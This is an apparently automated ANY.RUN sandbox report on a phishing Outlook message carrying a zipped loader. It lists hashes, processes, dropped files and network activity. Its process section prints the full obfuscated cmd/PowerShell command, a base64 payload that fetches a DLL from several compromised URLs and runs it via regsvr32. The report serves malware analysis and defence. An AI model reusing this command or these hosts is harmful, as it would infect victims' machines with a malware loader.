File name:

Re RE Life Insurance .msg

Full analysis: https://app.any.run/tasks/96d74c1d-69d2-4659-8911-b5ed57046b12
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 18, 2022, 20:00:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

5D9968803626B81284579AFF495F2883

SHA1:

78E3F26CE51BBC64B3B0373D42D1FA238943B82F

SHA256:

4C5EA49CF87AAC19ED0004F9DBAABD23915A7E0F6BE94415AAF9610974A775FE

SSDEEP:

768:3ahTtTvJU7R36EXn4nSBWsKvWWsKvx0f2SGYGmJXirIaSw+MAOfRH:uJU7R36EXn4SBW2WRJS4mwR3tN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3024)
    • Registers / Runs the DLL via REGSVR32.EXE

      • powershell.exe (PID: 3144)
    • Drops executable file immediately after starts

      • powershell.exe (PID: 3144)
  • SUSPICIOUS

    • Checks supported languages

      • WinRAR.exe (PID: 2152)
      • cmd.exe (PID: 3024)
      • powershell.exe (PID: 3144)
    • Reads the computer name

      • WinRAR.exe (PID: 2152)
      • powershell.exe (PID: 3144)
    • Reads Environment values

      • powershell.exe (PID: 3144)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3144)
    • Drops a file with a compile date too recent

      • powershell.exe (PID: 3144)
  • INFO

    • Reads the computer name

      • OUTLOOK.EXE (PID: 2976)
    • Checks supported languages

      • OUTLOOK.EXE (PID: 2976)
      • regsvr32.exe (PID: 2652)
    • Manual execution by user

      • WinRAR.exe (PID: 2152)
      • cmd.exe (PID: 3024)
    • Searches for installed software

      • OUTLOOK.EXE (PID: 2976)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 3144)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2976)
    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe winrar.exe no specs cmd.exe no specs powershell.exe regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Electronic form 05.17.2022 from Hotmail.zip"C:\Program Files\WinRAR\WinRAR.exeExplorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2652"C:\Windows\system32\regsvr32.exe" C:\Users\admin\AppData\Local\Temp\..\BEhFcGmnp\IfcziNlbBL.EnAC:\Windows\system32\regsvr32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
3
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2976"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Re RE Life Insurance .msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Exit code:
0
Version:
14.0.6025.1000
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\microsoft office\office14\outlook.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3024"C:\Windows\system32\cmd.exe" /v:on /c LokT3wLWANWBjWBohniZViYbccDKKNqejTUNd4gSPBBFa8ONZrWY7vG9r0M/ml4HNdUDB3p+||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3lhbWFkYS1zaG9zaGkubWFpbi5qcC95YW1hZGEtc2hvc2hpL2xnMS8iLCJodHRwOi8vbXNuZGVzaWduLm5sL2xpYnJhcmllcy9jOE52RlUxNC8iLCJodHRwczovL211c2N1bGF0aW9uLWVzaXNhLmZyL2Nzcy9pVTJTWWxmWXhzay8iLCJodHRwOi8vbWVkcmVnLnV6L0RvY3MvMWtqOHJlZmVMZG90UWVlMmYvIiwiaHR0cDovL3B1bnRhbWltYXJsaWsuY29tLnRyL3dwLWFkbWluLzlJVzdMMWdLd1dPb05RUkVKNi8iLCJodHRwOi8vd2FuZGVybHVzdHBodHJhdmVsLmNvbS9jZ2ktYmluL1FwaGZvUXE0dC8iKTskdD0iQkVoRmNHbW5wIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXElmY3ppTmxiQkwuRW5BO1JlZ3N2cjMyLmV4ZSAiJGRcSWZjemlObGJCTC5FbkEiO2JyZWFrfSBjYXRjaCB7IH19';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"C:\Windows\system32\cmd.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3144powershell.exe -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3lhbWFkYS1zaG9zaGkubWFpbi5qcC95YW1hZGEtc2hvc2hpL2xnMS8iLCJodHRwOi8vbXNuZGVzaWduLm5sL2xpYnJhcmllcy9jOE52RlUxNC8iLCJodHRwczovL211c2N1bGF0aW9uLWVzaXNhLmZyL2Nzcy9pVTJTWWxmWXhzay8iLCJodHRwOi8vbWVkcmVnLnV6L0RvY3MvMWtqOHJlZmVMZG90UWVlMmYvIiwiaHR0cDovL3B1bnRhbWltYXJsaWsuY29tLnRyL3dwLWFkbWluLzlJVzdMMWdLd1dPb05RUkVKNi8iLCJodHRwOi8vd2FuZGVybHVzdHBodHJhdmVsLmNvbS9jZ2ktYmluL1FwaGZvUXE0dC8iKTskdD0iQkVoRmNHbW5wIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXElmY3ppTmxiQkwuRW5BO1JlZ3N2cjMyLmV4ZSAiJGRcSWZjemlObGJCTC5FbkEiO2JyZWFrfSBjYXRjaCB7IH19';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
6 245
Read events
5 638
Write events
588
Delete events
19

Modification events

(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
(PID) Process:(2976) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1055
Value:
Off
Executable files
1
Suspicious files
3
Text files
11
Unknown types
3

Dropped files

PID
Process
Filename
Type
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRD4CB.tmp.cvr
MD5:
SHA256:
2976OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
MD5:
SHA256:
2976OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:
SHA256:
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.logtext
MD5:
SHA256:
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_ECE1E779EF6FAB4AA76E09BB642C7546.datxml
MD5:807EF0FC900FEB3DA82927990083D6E7
SHA256:4411E7DC978011222764943081500FFF0E43CBF7CCD44264BD1AB6306CA68913
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_FB4AEF069B6DB643B8D020F9C65EBE79.datxml
MD5:B21ED3BD946332FF6EBC41A87776C6BB
SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\OH097ZJR\Electronic form 05 17 2022 from Hotmail.zipcompressed
MD5:
SHA256:
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ConversationPrefs_2_1C43A0FBCB7D3545BF37BC2323E9EA81.datxml
MD5:57F30B1BCA811C2FCB81F4C13F6A927B
SHA256:612BAD93621991CB09C347FF01EC600B46617247D5C041311FF459E247D8C2D3
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\OH097ZJR\Electronic form 05 17 2022 from Hotmail.zip:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
2976OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{DC2F0940-93AC-4349-B006-ED33E195A1D2}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.pngimage
MD5:4C61C12EDBC453D7AE184976E95258E1
SHA256:296526F9A716C1AA91BA5D6F69F0EB92FDF79C2CB2CFCF0CEB22B7CCBC27035F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3144
powershell.exe
GET
200
157.7.107.117:80
http://yamada-shoshi.main.jp/yamada-shoshi/lg1/
JP
executable
840 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2976
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3144
powershell.exe
157.7.107.117:80
yamada-shoshi.main.jp
GMO Internet,Inc
JP
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
yamada-shoshi.main.jp
  • 157.7.107.117
suspicious

Threats

PID
Process
Class
Message
3144
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
3144
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3144
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info